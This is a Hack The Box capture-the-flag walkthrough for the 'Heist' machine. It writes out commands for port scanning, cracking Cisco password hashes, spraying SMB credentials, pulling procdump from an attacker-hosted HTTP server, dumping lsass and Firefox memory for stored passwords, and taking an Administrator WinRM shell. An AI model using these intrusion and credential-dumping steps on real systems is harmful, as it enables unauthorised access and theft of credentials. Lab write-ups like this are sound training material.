Hack The Box: Heist Walkthrough
Author: fkclai is a Certified Ethical Hacker, Penetration Tester, Auditor and a Tech Enthusiast with more than 5 years of experience in the field of Application Security. Contact Here
@27 Oct 2019
The game cannot be completed without the support of my friends David Au and other member of CTF Playgroup Hong Kong & Macau
Target machine: 10.10.10.149
Attacking (Hacker) machine: 10.10.15.203
The target machine IP is 10.10.10.149. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.
0.1) Quick Pre-searching
nmap 10.10.10.149 -oN nmap-quick-heist.txt
nmap -p- 10.10.10.149
0.2) Details Analysis
nmap -sV -p 80,135,445 -A -oN nmap-htb-heist.txt 10.10.10.149
80/tcp open http Microsoft IIS httpd 10.0
|_ httponly flag not set
|_ Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Nikto -- no vulnerability can be abused to bypass authentication.
dirb http://10.10.10.149/attachments/ /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
Go to http://10.10.10.149. You will see “Login as guest”.
After login as guest, you will see the Support Admin has opened account for user Hazard.
On the forum, there is also a Cisco config file attached here.
The config file contains three password hashes
Cisco password 7 can be decoded in this link: http://www.ifm.net.nz/cookbooks/passwordcracker.html
For Cisco enable secret, we can decrypt it by using john and rockyou wordlist in Kali
john --wordlist=rockyou.txt hash.txt
root@Kali:~/Desktop/Wordlist# john --show hash.txt
1 password hash cracked, 0 left
The config file contains three password hashes. The decrypted passwords are as following:
password 7 0242114B0E143F015F5D1E161713=> $uperP@ssword
password 7 02375012182C1A1D751618034F36415408=> Q4)sJu\Y8qz*A3?d
Enable secret $1$pdQG$o8nrSzsGXeaduXrjlvKc91=> stealth1agent
Not much valuable information is retrieved by this scanning
Look for smb vulnerabilities, but no exploitable vulnerabilities can be used
Use different tools to connect the Windows server and try different account/credential pairs. No exploitable share folder can be abused, but we confirm that password for user account Hazard is stealth1agent
(a)Smbclient -L 10.10.10.149 -U Hazard%stealth1agent
(b)smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
(c)rpcclient -H 10.10.10.149 -U Hazard -p stealth1agent
We can use rpcclient to open an authenticated SMB session to a target machine
Then, we perform enum4linux with a valid Windows user account.
enum4linux -v -a -S -U -d -u Hazard -p stealth1agent 10.10.10.149
Grep the enum result with keyword “Local”. We discover many Local accounts on the target Windows server.
Use smbclient to try different account and credential pairs, we confirm that another valid account-credential pair is Chase:Q4)sJu\Y8qz*A3?d . We have also checked there are no exploitable share folder for user Chase.
Crackmapexec smb 10.10.10.149 -u Hazard -p ‘stealth1agent’
Shell is not gained by crackmapexec
In service scanning, Server Port 5985 tcp is opened. After study, we find it is the infamous WindowsRM service.
At Desktop, we have found the user.txt (user-flag) and a todo.txt (not much valuable )
Confirm that there is only one admin account: administrators
Start a SimpleHTTP server on Kali
python -m SimpleHTTPServer 80
We download procdump.exe from Kali to the target machine. Even though there is exception, the executable can be uploaded successfully.
However, the process dump of Isass.exe is rejected.
cmd.exe /c "C:\Users\Chase\Desktop\procdump.exe" -ma lsass.exe -accepteula "C:\Users\Chase\Desktop\lsass.dmp"
Inspect the other running process on the target
There are many processes. After several trials, we discover user password in process firefox. It sounds reasonable, since the web browser has the highest chance to store user password.
Detail steps are as following:
PS > cmd.exe /c "C:\Users\Chase\Desktop\procdump.exe" -ma 5400 -accepteula "dmp"
Remark: 5400 is the pid of firefox at that time
Then, we use powershell to extract the password
Get-ChildItem -Path "C:\Users\Chase\Desktop\1928firefox.dmp" -Recurse -File | Select-String login
At the end of Part 3, we have obtained a new password.
Probably it is credential password of Administrator. Lets try for it !
Modify the winrm_shell.rb with administrator and the new password
We successfully gain the root shell and own the machine!!!!
Guide to SMB Enumeration